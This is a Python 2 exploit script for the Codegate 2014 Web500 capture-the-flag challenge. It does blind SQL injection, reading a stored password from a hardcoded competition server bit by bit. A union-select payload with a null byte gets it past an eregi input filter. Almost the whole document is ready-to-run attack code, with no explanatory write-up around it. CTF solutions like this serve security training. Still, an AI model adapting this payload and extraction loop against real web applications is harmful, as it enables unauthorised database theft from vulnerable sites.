Codegate 2014 (Web500) - Blind SQLi with bit shifting + bypass eregi

web500.py

import urllib,urllib2

def find_length(cmd):
	result = ""
	for bit in range(7,-1,-1):
		payload = "1\x00') union select (IF( (select (length((%s))>>%d)&1 ), '%s', 'wrong')),2#"%(cmd,bit,ip)
		param = urllib.urlencode({"password":payload})
		data = urllib.urlopen(site,param).read()
		if "True" in data:
			result += "1"
		else:
			result += "0"
	return int(result,2)

def find_char(cmd,position):
	result = ""
	for bit in range(7,-1,-1):
		payload = "1\x00') union select (IF((ascii(substr((%s),%d,1))>>%d)&1, '%s', 'wrong')),2#"%(cmd,position,bit,ip)
		param = urllib.urlencode({"password":payload})
		data = urllib.urlopen(site,param).read()
		if "True" in data:
			result += "1"
		else:
			result += "0"
	return chr(int(result,2))
ip = urllib2.urlopen('http://ip.42.pl/raw').read()
site = "http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/"
cmd = "select password from rms_120_pw where ip = 'my other IP'"
result = ""
result_length = int(find_length(cmd))
print result_length
for position in range(1,result_length+1):
	result += find_char(cmd, position)
	print result